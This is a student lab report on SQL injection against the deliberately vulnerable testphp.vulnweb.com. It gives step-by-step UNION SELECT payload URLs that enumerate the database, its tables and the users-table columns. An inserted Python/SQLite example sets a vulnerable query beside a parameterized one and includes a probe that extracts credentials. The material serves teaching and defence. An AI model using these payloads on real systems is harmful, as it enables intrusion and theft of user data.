
WEB & MOBILE SECURITY LAB

20CSP-338
Submitted for the requirement of

Lab Course

Bachelor Degree of Engineering

COMPUTER SCIENCE & ENGINEERING

Submitted to: Er. Jayesh Surana

Submitted By: Param Sahai (20BCS5964)

DEPARTMENT OF COMPUTER SCIENCE & ENGINEERING


CHANDIGARH UNIVERSITY, GHARUAN
August-December 2022
LAB INDEX

NAME: Param Sahai UID: 20BCS5964


SUBJECT NAME: WMS Lab SUBJECT CODE: 20CSP-338
Class/Section: 619/A

Sr. No.  Program                                                                                          Date        Evaluation: LW (12) / VV (8) / FW (10) / Total (30)   Sign

1.       Identify HTTP packet on a monitoring tool like Wireshark.                                        09/08/2022
2.       Design a method to simulate the HTML injection and cross site scripting to exploit the attackers. 16/08/2022
3.       Understand how to find CSRF vulnerability.                                                       28/08/2022
4.       Understand how to perform SQL injection.                                                         29/09/2022

Param Sahai
20BCS5964
Experiment 1.4

1. Aim/Overview of the practical:


To understand how to perform SQL Injection Attack from the command line (URL).

2. Task to be done/ Which logistics used:


To perform SQL Queries to obtain data using SQL Command Line Injection.
SQL Injection: SQL Injection (SQLi) is a type of injection attack that makes it possible to execute malicious SQL statements. These statements control the database server behind a web application. Attackers can use SQL Injection vulnerabilities to bypass application security measures: they can get around the authentication and authorization of a web page or web application and retrieve the content of the entire SQL database. They can also use SQL Injection to add, modify, and delete records in the database.

testphp.vulnweb.com: the intentionally vulnerable test site that we'll be using to perform SQL injection.

3. Steps:

i. Here we'll be using another vulnerable site: testphp.vulnweb.com.

ii. Now, copy and paste the following link: http://testphp.vulnweb.com/listproducts.php?cat=1

iii. Next, insert the malicious query (URL) by adding a minus sign before 1, i.e.
http://testphp.vulnweb.com/listproducts.php?cat=-1

iv. We can also put a random number in the URL along with the ORDER BY clause.

v. Now, in order to check the database, search:
http://testphp.vulnweb.com/listproducts.php?cat=-1 union select 1,2,3,4,5,6,7,8,9,10, database()--

vi. For checking the table name:
http://testphp.vulnweb.com/listproducts.php?cat=1%20union%20select%201,2,3,4,5,6,7,8,9,10,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()--
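To make clear why the cat= parameter above is injectable and what the fix looks like, here is an added example that is not part of the lab or of the vulnweb site's code: the listproducts.php?cat= pattern rebuilt in Python against a constructed in-memory SQLite database, with the string-concatenated query beside a parameterized one. The table names, columns and rows are made up for the example.

```python
import sqlite3

def build_db():
    # Constructed stand-in for the site's schema: a products table queried by
    # category, and a users table that a UNION query can reach across to.
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE products (id INTEGER, cat INTEGER, name TEXT);
        CREATE TABLE users (uname TEXT, pass TEXT);
        INSERT INTO products VALUES (1, 1, 'Lamp'), (2, 2, 'Chair');
        INSERT INTO users VALUES ('alice', 's3cret');
    """)
    return conn

def list_products_vulnerable(conn, cat):
    # The bug behind listproducts.php?cat=: the raw query-string value is
    # concatenated into the SQL text, so it is parsed as SQL, not as data.
    sql = "SELECT id, name FROM products WHERE cat=" + cat
    return conn.execute(sql).fetchall()

def list_products_safe(conn, cat):
    # Hardened form: validate the type, then bind the value as a parameter.
    # A bound value can never change the statement's structure, so a UNION
    # or comment sequence in it is simply a failed integer parse.
    try:
        cat_id = int(cat)
    except ValueError:
        raise ValueError("cat must be an integer")
    sql = "SELECT id, name FROM products WHERE cat=?"
    return conn.execute(sql, (cat_id,)).fetchall()

# cat=-1 empties the products result so only the UNION's rows show; the
# SELECT list must match the column count (2 here, 10 on the lab's site).
UNION_PROBE = "-1 UNION SELECT uname, pass FROM users--"

if __name__ == "__main__":
    db = build_db()
    print(list_products_vulnerable(db, "1"))          # [(1, 'Lamp')]
    print(list_products_vulnerable(db, UNION_PROBE))  # [('alice', 's3cret')]
    print(list_products_safe(db, "1"))                # [(1, 'Lamp')]
    try:
        list_products_safe(db, UNION_PROBE)
    except ValueError as err:
        print("rejected:", err)
```

The same integer-validation step also turns the ORDER BY probe from step iv into a rejected request rather than an information leak about the column count.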

Fig 1.4.1 (How a SQL Injection attack works)

4. Screenshots:

Fig 1.4.2 (Opening a vulnerable site : VULNEB )

Fig 1.4.3 (Checking out our query with cat=1)

Fig 1.4.4 (Checking out our query with cat=-1)

Fig 1.4.5 (Performing Union Select Query for checking out the Database)

Fig 1.4.6 (Performing Union Select Query for checking out the Tablename)

Maybe we can get some important data from the users table, so let's dig deeper. Again, use the concat function on the users table to retrieve all of its column names.
We successfully retrieve all eight column names from the users table.

Fig 1.4.7 (Retrieving the Column Names using concat function)

Evaluation Grid (To be created as per the SOP and Assessment guidelines by the faculty):

Sr. No. Parameters Marks Obtained Maximum Marks


1.
2.
3.
